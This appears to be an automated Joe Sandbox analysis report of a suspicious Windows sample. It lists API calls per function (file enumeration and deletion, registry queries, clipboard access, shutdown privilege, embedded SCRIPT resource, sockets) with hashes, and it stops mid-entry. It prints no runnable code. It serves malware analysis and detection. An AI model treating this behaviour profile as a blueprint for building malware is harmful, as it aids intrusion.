                                                                                                                                                                              • Opcode ID: c687bcd4fd271892cae94832312002b8224990235ad63c9a7adb7df77bf177ad
                                                                                                                                                                              • Instruction ID: c794eeccb09a24052bbcf597a765afb85aa8c144a0484c63b5d17eda91bc299e
                                                                                                                                                                              • Opcode Fuzzy Hash: c687bcd4fd271892cae94832312002b8224990235ad63c9a7adb7df77bf177ad
                                                                                                                                                                              • Instruction Fuzzy Hash: 7AD14D72508304AEC710EB64C895EAFB7ECEF99704F44091DF586D6292EB74DA48CB72
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E1A0A8
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00E1A0E6
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00E1A100
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00E1A118
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E1A123
                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00E1A13F
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E1A18F
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00E67B94), ref: 00E1A1AD
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E1A1B7
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E1A1C4
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E1A1D4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1409584000-438819550
                                                                                                                                                                              • Opcode ID: 6ba3c1cb2d78948bf4eaf691c2e7c1580ba788d1d7c4aceccc2a0e87625805d4
                                                                                                                                                                              • Instruction ID: 1e51b0321b7f47fd476804bf822103a440fbf3ea59cd5657b6714c5b00a13f9a
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ba3c1cb2d78948bf4eaf691c2e7c1580ba788d1d7c4aceccc2a0e87625805d4
                                                                                                                                                                              • Instruction Fuzzy Hash: 7931E27260621D7FDB10AFB5EC4DAEE77ACAF05364F1411A5E815F30A0EB70DE848A21
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E14785
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E147B2
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E147E2
                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E14803
                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00E14813
                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E1489A
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E148A5
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E148B0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                                                              • API String ID: 1149970189-3457252023
                                                                                                                                                                              • Opcode ID: 94c5e30539d350f6121176a597ca1226c6dac965b28290771738aff454a1f3e3
                                                                                                                                                                              • Instruction ID: f4e5451889f23f11100864b37555eb50e6dd77a0b309304003fc70137a4d6d15
                                                                                                                                                                              • Opcode Fuzzy Hash: 94c5e30539d350f6121176a597ca1226c6dac965b28290771738aff454a1f3e3
                                                                                                                                                                              • Instruction Fuzzy Hash: ED3192B150424AAFDB219FA1EC49FEB37BDEF89744F1041B6F509E61A0E77096848B34
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E1A203
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00E1A25E
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E1A269
                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00E1A285
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E1A2D5
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00E67B94), ref: 00E1A2F3
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E1A2FD
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E1A30A
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E1A31A
                                                                                                                                                                                • Part of subcall function 00E0E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E0E3B4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 2640511053-438819550
                                                                                                                                                                              • Opcode ID: 86d79499589905e587c297819c513bbb65069130aaa7e7bb03ff72f9f1b4f19c
                                                                                                                                                                              • Instruction ID: 0bf5dbfd9f12cfab5a4eca04934ff6d2acc6bf499f7396d3467728b0a5394217
                                                                                                                                                                              • Opcode Fuzzy Hash: 86d79499589905e587c297819c513bbb65069130aaa7e7bb03ff72f9f1b4f19c
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E31E57150621D6ECB10AFB5FC09EEE77AD9F45328F1851A5E810B30A0D771DEC5CA61
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C99E
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00E2CA09
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E2CA2D
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E2CA8C
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E2CB47
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E2CBB4
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E2CC49
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2CC9A
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E2CD43
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E2CDE2
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E2CDEF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3102970594-0
                                                                                                                                                                              • Opcode ID: 20578f11728db2103fd264b8a4fb86b2065e22ac10cc06963c808342f02cab26
                                                                                                                                                                              • Instruction ID: 9d9d9d5832bd590195618e963aefb0747d3fbe653c32f0d8206aa337c8233c98
                                                                                                                                                                              • Opcode Fuzzy Hash: 20578f11728db2103fd264b8a4fb86b2065e22ac10cc06963c808342f02cab26
                                                                                                                                                                              • Instruction Fuzzy Hash: 050273716042109FC714DF28D895E2ABBE5FF89318F18849DF84ADB2A2D731ED46CB61
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
                                                                                                                                                                                • Part of subcall function 00E0EAB0: GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E0D9CD
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E0DA88
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00E0DA9B
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0DAB8
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E0DAE2
                                                                                                                                                                                • Part of subcall function 00E0DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E0DAC7,?,?), ref: 00E0DB5D
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00E0DAFE
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E0DB0F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 1946585618-1173974218
                                                                                                                                                                              • Opcode ID: 2458616a6b30ea34313ac599d3a363f03dc7259077111f887985a14fa924fd09
                                                                                                                                                                              • Instruction ID: 0bd7bb2260f9d039e0f2b524d55c8e49a22f16e531d437d0a14549e83539a3de
                                                                                                                                                                              • Opcode Fuzzy Hash: 2458616a6b30ea34313ac599d3a363f03dc7259077111f887985a14fa924fd09
                                                                                                                                                                              • Instruction Fuzzy Hash: 5361173190910DAECF05EBE0DD92AEDBBB5EF15314F6441A5E402761A2EB319F4ACB70
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                                                              • Opcode ID: b587b5bac243c49e7a46ca14ab926abb4974f95130bd70f13d74d60684047384
                                                                                                                                                                              • Instruction ID: ac2d1b265cd15339a7ed8e6f3714981d108c259723427d5480bc320e77af1c4a
                                                                                                                                                                              • Opcode Fuzzy Hash: b587b5bac243c49e7a46ca14ab926abb4974f95130bd70f13d74d60684047384
                                                                                                                                                                              • Instruction Fuzzy Hash: D7419F30604601AFD314DF16E889B59BBE4FF44318F14C4A9E8299B672C735ED85CBE0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E02010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0205A
                                                                                                                                                                                • Part of subcall function 00E02010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E02087
                                                                                                                                                                                • Part of subcall function 00E02010: GetLastError.KERNEL32 ref: 00E02097
                                                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00E0F249
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                              • API String ID: 2234035333-3163812486
                                                                                                                                                                              • Opcode ID: c3141d49796ced023b791799cced653ae24abc47e75edb38875c527cf6a484ac
                                                                                                                                                                              • Instruction ID: ef23b26f1c49fbc3b80b26479f47cad3491e81954249cb263ee2045b1b73b8d5
                                                                                                                                                                              • Opcode Fuzzy Hash: c3141d49796ced023b791799cced653ae24abc47e75edb38875c527cf6a484ac
                                                                                                                                                                              • Instruction Fuzzy Hash: 3701497A6153146FEB3462F8AC8AFFF72AC9B08348F151431FD02F20F1D9604CA592A0
                                                                                                                                                                              APIs
                                                                                                                                                                              • DefDlgProcW.USER32(?,?), ref: 00DA233E
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00DA2421
                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00DA2434
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$Proc
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 929743424-2063206799
                                                                                                                                                                              • Opcode ID: 7ce0c0af598311cb80008f14e07e9c43f2718f20f02cfb337e6d84c40e37cc2b
                                                                                                                                                                              • Instruction ID: 235bf9e28edbcfd5426c33f701787a5e50cfee3a0f885b79401be072835efb7b
                                                                                                                                                                              • Opcode Fuzzy Hash: 7ce0c0af598311cb80008f14e07e9c43f2718f20f02cfb337e6d84c40e37cc2b
                                                                                                                                                                              • Instruction Fuzzy Hash: 938106B1108484BEEA29763F4C9DE7F299EDB47300F19050DF182D7996CA9ACF42D276
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DE56C2,?,?,00000000,00000000), ref: 00E13A1E
                                                                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DE56C2,?,?,00000000,00000000), ref: 00E13A35
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00DE56C2,?,?,00000000,00000000,?,?,?,?,?,?,00DA66CE), ref: 00E13A45
                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00DE56C2,?,?,00000000,00000000,?,?,?,?,?,?,00DA66CE), ref: 00E13A56
                                                                                                                                                                              • LockResource.KERNEL32(00DE56C2,?,?,00DE56C2,?,?,00000000,00000000,?,?,?,?,?,?,00DA66CE,?), ref: 00E13A65
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                              • String ID: SCRIPT
                                                                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                                                                              • Opcode ID: d9145db21d8a0b532ee50609597c9065473a3780b7740efc6826c576aaf7ac54
                                                                                                                                                                              • Instruction ID: f8d3653491c893339133abfce1c4e5bf2d5fdc5dac53438195ec09d2f4de0312
                                                                                                                                                                              • Opcode Fuzzy Hash: d9145db21d8a0b532ee50609597c9065473a3780b7740efc6826c576aaf7ac54
                                                                                                                                                                              • Instruction Fuzzy Hash: B011A970200305BFE7208B26EC48F677BB9EFC4B45F1042ACB452E62A0DB71EC408A60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E01900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E01916
                                                                                                                                                                                • Part of subcall function 00E01900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E01922
                                                                                                                                                                                • Part of subcall function 00E01900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E01931
                                                                                                                                                                                • Part of subcall function 00E01900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E01938
                                                                                                                                                                                • Part of subcall function 00E01900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E0194E
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00E01C81), ref: 00E020FB
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E02107
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00E0210E
                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E02127
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00E01C81), ref: 00E0213B
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E02142
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3008561057-0
                                                                                                                                                                              • Opcode ID: a96068b501ee499ba1d39d206558c78ef8ffc3f24e5ca6b2fd027098b3508666
                                                                                                                                                                              • Instruction ID: 30f19689da4abbde320a6a628bdda8bf1943dcf475091636e3dd1b401b9e4bda
                                                                                                                                                                              • Opcode Fuzzy Hash: a96068b501ee499ba1d39d206558c78ef8ffc3f24e5ca6b2fd027098b3508666
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D11BE71502208FFDB149FA5DC0DBAE7BBAEF44359F14805CEA81B71A0C7369984DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E1A5BD
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E1A6D0
                                                                                                                                                                                • Part of subcall function 00E142B9: GetInputState.USER32 ref: 00E14310
                                                                                                                                                                                • Part of subcall function 00E142B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E143AB
                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E1A5ED
                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E1A6BA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1972594611-438819550
                                                                                                                                                                              • Opcode ID: 77cd73f662bf5a9ce522de880666024eb345f3fcb02ad0ef2079526a89a956eb
                                                                                                                                                                              • Instruction ID: ca008169a84c9cb53aeeb2c4b9123289f128feca39b23d81ca1868881e12f574
                                                                                                                                                                              • Opcode Fuzzy Hash: 77cd73f662bf5a9ce522de880666024eb345f3fcb02ad0ef2079526a89a956eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 8541307190520A9FCF14DFA4DC49AEEBBB9FF05314F285166E805B21A1EB319E84CF61
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E23AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E23AD7
                                                                                                                                                                                • Part of subcall function 00E23AAB: _wcslen.LIBCMT ref: 00E23AF8
                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E222BA
                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00E222E1
                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00E22338
                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00E22343
                                                                                                                                                                              • closesocket.WSOCK32(00000000), ref: 00E22372
                                                                                                                                                                              Memory Dump Source
